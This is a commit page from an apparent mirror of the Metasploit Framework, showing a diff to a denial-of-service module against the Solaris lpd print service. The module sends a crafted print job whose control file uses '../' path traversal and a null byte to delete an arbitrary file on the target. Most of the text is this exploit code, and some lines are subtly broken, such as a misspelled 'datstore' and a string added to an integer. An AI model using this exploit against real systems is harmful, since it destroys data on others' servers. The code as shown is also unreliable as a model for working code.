infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

More better randomization 

git-svn-id: file:///home/svn/framework3/trunk@5325 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-01-23 02:22:36 +00:00
parent 4f45051b18
commit e189b2f6cd
1 changed files with 14 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/auxiliary/dos/solaris/lpd/cascade_delete.rb
View File

@ -1,5 +1,5 @@
## ##
# $Id:$ # $Id$
## ##
## ##
@ -34,6 +34,9 @@ class Auxiliary::Dos::Solaris::Lpd::CascadeDelete < Msf::Auxiliary
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'CVE', '2005-4797' ],
[ 'BID', '14510' ],
[ 'OSVDB', '18650' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
] ]
)) ))
@ -47,8 +50,13 @@ class Auxiliary::Dos::Solaris::Lpd::CascadeDelete < Msf::Auxiliary
def run def run
r_hostname = rand_text_alpha(rand(8)+1)
r_user = rand_text_alpha(rand(8)+1)
r_spool = rand_text_alpha(rand(8)+1)
# Create a simple control file... # Create a simple control file...
control = "Hmetasploit\nPr00t\n"; control = "H#{r_hostname}\nP#{r_user}\n";
# The job ID is squashed down to three decimal digits # The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0] jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
@ -57,7 +65,7 @@ class Auxiliary::Dos::Solaris::Lpd::CascadeDelete < Msf::Auxiliary
sock1 = connect(false) sock1 = connect(false)
# Request a cascaded job # Request a cascaded job
sock1.put("\x02metasploit:framework\n") sock1.put("\x02#{r_hostname}:#{r_spool}\n")
res = sock1.get_once res = sock1.get_once
if (not res) if (not res)
print_status("The target did not accept our job request command") print_status("The target did not accept our job request command")
@ -70,12 +78,12 @@ class Auxiliary::Dos::Solaris::Lpd::CascadeDelete < Msf::Auxiliary
# null byte will prevent the parser from processing the other paths. # null byte will prevent the parser from processing the other paths.
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n" control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
dataf = "http://metasploit.com/\n" dataf = rand_text_alpha(100)+1
print_status("Deleting #{datstore['RPATH']}...") print_status("Deleting #{datstore['RPATH']}...")
if (not ( if (not (
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf) send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
) ) ) )
sock1.close sock1.close
return return